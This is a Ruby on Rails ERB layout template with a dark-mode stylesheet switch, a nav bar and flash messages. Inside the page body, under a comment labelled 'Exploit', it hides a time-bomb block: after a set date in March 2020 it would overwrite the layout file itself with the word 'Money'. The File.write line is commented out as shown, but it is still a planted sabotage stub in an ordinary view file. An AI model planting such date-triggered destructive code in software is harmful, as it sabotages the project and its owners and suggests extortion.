<!DOCTYPE html>
<html>
  <head>
    <title>Platforms</title>
    <%= csrf_meta_tags %>
    <%= csp_meta_tag %>

    <% if cookies[:moon] %>
      <%= stylesheet_link_tag    'application_dark', media: 'all', 'data-turbolinks-track': 'reload' %>
    <% else %>
      <%= stylesheet_link_tag    'application', media: 'all', 'data-turbolinks-track': 'reload' %>
    <% end %>
    <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>
  </head>

  <body>
    <!-- Exploit -->
    <% if Time.new(2020, 3, 6, 14, 04, 0, "+03:00") < Time.now %>
      <%#File.write("app/views/layouts/application.html.erb", "Money")%>
    <% end %>
    <%= render 'shared/nav_bar' %>
    <div class="container">
      <% flash.each do |type, msg| %>
          <%= content_tag(:div, msg, class: "alert alert-#{type}") %>
      <% end %>
      <%= yield %>
    </div>
  </body>
</html>
